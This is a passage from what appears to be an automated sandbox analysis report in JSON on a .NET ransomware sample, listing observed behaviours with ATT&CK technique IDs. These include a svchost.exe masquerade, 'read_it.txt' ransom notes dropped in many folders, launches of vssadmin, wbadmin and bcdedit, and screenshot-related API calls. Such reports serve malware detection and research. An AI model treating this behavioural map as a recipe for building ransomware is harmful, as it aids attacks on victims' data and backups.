\"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"svchost.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe.config\"\n \"svchost.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"svchost.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\77\\\"\n \"svchost.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.INI\"\n \"svchost.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe.Local\\\"\n \"svchost.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"svchost.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\7-Zip\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\7-Zip\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\read_it.txt\"\n \"svchost.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\read_it.txt\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" queries basic process information of the \"C:\\Windows\\System32\\en-US\\KernelBase.dll.mui\" (UID: 5860)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" connecting to \"\\ThemeApiPort\"\n \"WMIC.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"svchost.exe\" writes file \"c:\\torservice\\tor\\pluggable_transports\\bridges_list.meek-azure.txt.0cok\"\n \"svchost.exe\" writes file \"c:\\torservice\\tor\\pluggable_transports\\bridges_list.meek-azure.txt\"\n \"svchost.exe\" writes file \"c:\\torservice\\tor\\pluggable_transports\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\programdata\\adobe\\setup\\{ac76ba86-7ad7-1033-7b44-ac0f074e4100}\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\programdata\\package cache\\{73f77e4e-5a17-46e5-a5fc-8a061047725f}v14.36.32532\\packages\\vcruntimeminimum_x86\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\programdata\\package cache\\{c2c59cab-8766-4abd-a8ef-1151a36c41e5}v14.36.32532\\packages\\vcruntimeadditional_x86\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\adobe\\acrobat\\dc\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\elevateddiagnostics\\460911090\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\elevateddiagnostics\\460911090\\2020062417.000\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\crashpad\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\extension scripts\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\gcm store\\encryption\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\leveldb\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\shared_proto_db\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\shared_proto_db\\metadata\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\site characteristics database\\read_it.txt\"\n \"svchost.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\google\\chrome\\user data\\default\\sync data\\leveldb\\read_it.txt\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-203", "type": 6, "relevance": 3, "name": "Tries to access LNK files (Windows shortcut)", "description": "\"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Python 3.8\\IDLE (Python 3.8 32-bit).lnk\"\n \"svchost.exe\" trying to access LNK file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Python 3.8\\Python 3.8 Manuals (32-bit).lnk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "handle-2", "type": 5, "relevance": 10, "name": "Accessed IE Quick Launch directory", "description": "\"svchost.exe\" obtained handle to \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.ohxq\" (Type: \"FileHandle\")\n \"svchost.exe\" obtained handle to \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk\" (Type: \"FileHandle\")\n \"svchost.exe\" obtained handle to \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.e7ci\" (Type: \"FileHandle\")\n \"svchost.exe\" obtained handle to \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\" (Type: \"FileHandle\")\n \"svchost.exe\" obtained handle to \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Wireshark.lnk\" (Type: \"FileHandle\")\n \"svchost.exe\" obtained handle to \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk\" (Type: \"FileHandle\")", "origin": "Touched Handle", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\bcdedit.exe\")\n \"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\wbadmin.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"LoadResource with parameter \" (UID: 00000000-00005860)\n \"svchost.exe\" called \"LoadResource with parameter \" (UID: 00000000-00004160)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1617362944', 'hResInfo': '1618237096'}\" (UID: 00000000-00003644)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '3801089', 'hResInfo': '3801744'}\" (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"vssadmin.exe\" at 00000000-00003904-00000105-1447968\n \"WMIC.exe\" at 00000000-00003644-00000105-522750\n \"wbadmin.exe\" at 00000000-00003540-00000105-1006086", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"GetVersionExA\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"GetVersionExA\" (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100372c2c4973576f77363450726f636573732c6b65726e656c33322e646c6c2c223235323a30323a34372e363738222c52583d302c50583d300030006c69634b6579546f6b656e3d623033663566376631316435306133612220616c6c6f77446566696e6974696f6e3d224d616368696e65 (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004160)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"GetLocaleInfoW\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"GetLocaleInfoW\" (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"OpenMutexW\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"OpenMutexW\" (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" queries volume information of \"C:\\ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" at 00000000-00005860-0000010C-2336676\n \"svchost.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" at 00000000-00004160-0000010C-2666227", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"RtlGetVersion\" (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"IsWow64Process\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"IsWow64Process\" (UID: 00000000-00004160)\n \"svchost.exe\" called \"IsWow64Process\" with parameter \"4160\" - (UID: 00000000-00004160)\n \"cmd.exe\" called \"IsWow64Process\" (UID: 00000000-00005988)\n \"vssadmin.exe\" called \"IsWow64Process\" with parameter \"3904\" - (UID: 00000000-00003904)\n \"WMIC.exe\" called \"IsWow64Process\" with parameter \"3644\" - (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"RtlGetNtProductType\" (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"LookupAccountSidW\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004160)\n \"wbadmin.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003540)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"GetWindowTextW\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"GetWindowTextW\" (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"CreateCompatibleBitmap\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"CreateCompatibleBitmap\" (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"GetNativeSystemInfo\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"svchost.exe\" called \"GetNativeSystemInfo\" (UID: 00000000-00004160)\n \"WMIC.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\77\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Serv759bfb78#\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\Recovery\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\Recovery\\cf812052-d863-11e7-ae2b-a9d1a6f40333\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\System Volume Information\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\Temp\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\TorService\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\TorService\\data\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\TorService\\tor\\* (UID: 00000000-00004160)\n \"svchost.exe\" called \"FindFirstFileW\" with parameter C:\\TorService\\tor\\pluggable_transports\\* (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00004160)\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00005988)\n \"WMIC.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004160)\n \"vssadmin.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003904)\n \"WMIC.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003644)\n \"wbadmin.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003540)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-150", "relevance": 1, "name": "Dotnet code contains ability to generate random numbers", "description": "Observed namespace \"System.Security.Cryptography.RNGCryptoServiceProvider\" and TypeReference \".ctor\" in \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\"\n Observed namespace \"System.Security.Cryptography.RandomNumberGenerator\" and TypeReference \"GetBytes\" in \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005860)\n \"svchost.exe\" called an API \"AdjustTokenPrivileges\"on file: C:\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll\" (UID: 00000000-00004160), \"WMIC.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" opened \"\\Device\\KsecDD\"\n \"svchost.exe\" opened \"\\Device\\KsecDD\"\n \"vssadmin.exe\" opened \"\\Device\\KsecDD\"\n \"WMIC.exe\" opened \"\\Device\\KsecDD\"\n \"wbadmin.exe\" opened 